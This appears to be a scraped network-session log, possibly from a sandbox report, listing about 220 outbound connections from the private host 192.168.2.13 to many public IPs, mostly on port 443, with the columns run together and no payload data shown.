                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18556192.168.2.133526039.140.220.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18557192.168.2.1360404142.93.4.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18558192.168.2.1339010200.189.45.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18559192.168.2.133732047.35.163.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18560192.168.2.1359744222.19.149.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18561192.168.2.133756241.90.95.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18562192.168.2.134695654.43.143.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18563192.168.2.1348112181.79.104.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18564192.168.2.1348862151.218.199.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18565192.168.2.134162814.15.189.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18566192.168.2.135223451.71.91.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18567192.168.2.134231099.245.205.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18568192.168.2.135984885.239.151.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18569192.168.2.134132219.87.78.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18570192.168.2.1346420112.109.207.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18571192.168.2.133813471.137.90.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18572192.168.2.1336302123.15.250.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18573192.168.2.1347968208.133.138.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18574192.168.2.1343850148.74.181.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18575192.168.2.1355822221.95.129.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18576192.168.2.1342602161.208.124.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18577192.168.2.134873282.11.250.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18578192.168.2.1359662124.122.229.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18579192.168.2.135111063.149.172.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18580192.168.2.134024240.129.4.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18581192.168.2.1353726197.54.119.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18582192.168.2.1353578135.95.238.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18583192.168.2.1353542157.65.108.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18584192.168.2.133821634.151.195.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18585192.168.2.133572823.50.215.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18586192.168.2.134026495.236.128.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18587192.168.2.134081280.44.123.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18588192.168.2.1357450130.234.130.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18589192.168.2.135873893.83.56.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18590192.168.2.134590090.225.163.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18591192.168.2.135493657.31.158.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18592192.168.2.134682625.180.120.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18593192.168.2.1359782148.194.149.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18594192.168.2.1335900119.47.63.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18595192.168.2.1346808130.211.109.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18596192.168.2.1334578205.245.194.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18597192.168.2.1359520159.168.61.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18598192.168.2.1357550211.73.112.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18599192.168.2.1343012163.33.182.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18600192.168.2.1343930110.252.28.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18601192.168.2.1351518171.185.241.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18602192.168.2.1347690133.84.105.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18603192.168.2.1359926203.126.54.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18604192.168.2.1348360204.254.83.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18605192.168.2.1353352184.125.62.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18606192.168.2.133586475.18.210.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18607192.168.2.1352376135.86.128.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18608192.168.2.1344768223.237.190.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18609192.168.2.134614291.250.189.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18610192.168.2.1336614180.18.40.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18611192.168.2.135435892.4.40.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18612192.168.2.134575092.66.102.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18613192.168.2.135298665.196.245.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18614192.168.2.134169899.226.196.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18615192.168.2.135027235.77.249.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18616192.168.2.135354613.104.131.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18617192.168.2.134868881.152.38.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18618192.168.2.1334068199.219.253.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18619192.168.2.1336326133.108.23.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18620192.168.2.1341344189.63.215.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18621192.168.2.1347098178.255.61.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18622192.168.2.1341112175.134.164.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18623192.168.2.1354274131.1.114.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18624192.168.2.1349324190.124.216.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18625192.168.2.133739235.235.253.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18626192.168.2.1337164110.223.45.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18627192.168.2.135726635.103.168.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18628192.168.2.1357346125.163.69.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18629192.168.2.1334874187.245.205.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18630192.168.2.1356684118.38.140.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18631192.168.2.135945020.248.114.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18632192.168.2.133898851.81.90.2558080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18633192.168.2.1347488131.134.36.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18634192.168.2.1336286194.35.4.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18635192.168.2.135743473.213.58.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18636192.168.2.1333580209.189.101.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18637192.168.2.1347560217.211.3.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18638192.168.2.135816479.159.205.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18639192.168.2.133770091.68.99.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18640192.168.2.135515227.248.189.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18641192.168.2.135042270.101.151.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18642192.168.2.1351536195.65.136.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18643192.168.2.1336250158.172.173.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18644192.168.2.1333122203.250.129.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18645192.168.2.1357638147.254.252.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18646192.168.2.1360670187.236.220.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18647192.168.2.1355330102.28.21.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18648192.168.2.1339010137.119.218.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18649192.168.2.1333958154.65.220.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18650192.168.2.1349652206.139.60.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18651192.168.2.1335262206.248.97.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18652192.168.2.133639431.47.30.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18653192.168.2.1345820128.39.10.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18654192.168.2.133773691.167.239.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18655192.168.2.1333972170.253.62.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18656192.168.2.1352848129.254.244.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18657192.168.2.134657841.4.202.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18658192.168.2.1340724153.59.148.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18659192.168.2.1358602187.34.85.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18660192.168.2.1350716122.62.59.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18661192.168.2.1353066194.106.59.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18662192.168.2.1359046160.76.0.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18663192.168.2.1348548136.74.210.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18664192.168.2.1333640223.164.19.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18665192.168.2.1334292169.54.113.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18666192.168.2.133360489.200.1.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18667192.168.2.133961483.41.159.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18668192.168.2.134121269.118.218.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18669192.168.2.1334690204.121.3.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18670192.168.2.1357276218.109.247.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18671192.168.2.1359234104.67.101.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18672192.168.2.1337684143.141.139.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18673192.168.2.1360610174.217.245.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18674192.168.2.134693098.178.97.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18675192.168.2.1333522117.124.178.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18676192.168.2.1351516112.179.161.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18677192.168.2.1343304128.169.220.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18678192.168.2.1357112205.22.82.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18679192.168.2.1360252117.144.200.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18680192.168.2.1338292103.45.149.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18681192.168.2.133609219.183.204.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18682192.168.2.134237065.247.182.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18683192.168.2.134769817.85.113.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18684192.168.2.134623279.140.124.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18685192.168.2.1338758158.79.219.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18686192.168.2.1340500206.36.60.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18687192.168.2.136074452.95.17.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18688192.168.2.1359480217.104.41.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18689192.168.2.135683849.66.117.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18690192.168.2.135984458.213.221.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18691192.168.2.134198452.174.156.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18692192.168.2.1333392206.218.199.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18693192.168.2.1359984106.24.29.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18694192.168.2.1338338111.59.191.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18695192.168.2.1357322102.82.70.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18696192.168.2.133561441.191.21.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18697192.168.2.133353643.75.99.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18698192.168.2.1347470217.59.146.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18699192.168.2.1332932146.200.150.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18700192.168.2.134123679.147.127.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18701192.168.2.13489141.25.66.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18702192.168.2.1352268189.215.192.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18703192.168.2.135217034.9.184.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18704192.168.2.134890012.241.185.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18705192.168.2.135365044.134.190.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18706192.168.2.1354030168.232.56.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18707192.168.2.13588749.10.218.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18708192.168.2.1335744150.65.125.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18709192.168.2.134631220.120.251.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18710192.168.2.1344064162.252.252.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18711192.168.2.1347588183.35.28.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18712192.168.2.13422809.187.101.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18713192.168.2.1358614145.133.216.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18714192.168.2.1355838221.176.75.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18715192.168.2.1349248160.254.250.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18716192.168.2.133918636.142.88.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18717192.168.2.1335568179.47.89.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18718192.168.2.1338006101.222.20.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18719192.168.2.1348588212.89.205.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18720192.168.2.13333161.143.167.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18721192.168.2.1354196165.5.128.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18722192.168.2.1335564195.64.154.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18723192.168.2.1339278128.165.7.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18724192.168.2.1346002146.172.169.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18725192.168.2.1342484197.134.45.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18726192.168.2.133863477.15.35.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18727192.168.2.1336620137.183.175.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18728192.168.2.1348594166.107.67.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18729192.168.2.135223214.134.215.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18730192.168.2.134061879.69.124.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18731192.168.2.1347984100.223.112.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18732192.168.2.1337212162.220.59.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18733192.168.2.1342504151.184.219.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18734192.168.2.134566448.36.104.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18735192.168.2.1347178187.213.116.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18736192.168.2.1335064137.35.88.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18737192.168.2.1342798137.62.67.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18738192.168.2.135103861.25.7.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18739192.168.2.1345992130.177.31.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18740192.168.2.1358562191.120.235.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18741192.168.2.1337650133.39.203.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18742192.168.2.135398066.214.185.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18743192.168.2.1358540160.67.215.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18744192.168.2.1348092122.25.113.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18745192.168.2.1358954146.241.158.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18746192.168.2.1342456152.14.169.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18747192.168.2.133423097.3.110.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18748192.168.2.133369464.238.126.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18749192.168.2.1344932110.235.55.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18750192.168.2.1345540117.6.90.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18751192.168.2.1348168181.70.109.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18752192.168.2.1338388204.160.232.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18753192.168.2.1339582143.249.16.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18754192.168.2.1344264180.241.0.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18755192.168.2.1337082121.175.85.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18756192.168.2.1342514139.230.245.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18757192.168.2.133596283.60.86.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18758192.168.2.134230683.42.194.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18759192.168.2.1343620203.215.110.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18760192.168.2.1349746107.76.181.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18761192.168.2.1340018189.202.113.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18762192.168.2.134030669.20.222.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18763192.168.2.1352936151.133.236.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18764192.168.2.1344936178.14.239.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18765192.168.2.1345780173.58.160.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18766192.168.2.1333964125.63.92.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18767192.168.2.1345892106.214.13.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18768192.168.2.133747261.159.139.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18769192.168.2.1343102149.1.228.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18770192.168.2.135770899.56.152.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18771192.168.2.1351322221.199.28.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18772192.168.2.135677438.174.37.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18773192.168.2.1334700126.85.165.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18774192.168.2.135284886.134.36.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18775192.168.2.1358646112.222.202.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18776192.168.2.135705632.198.94.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
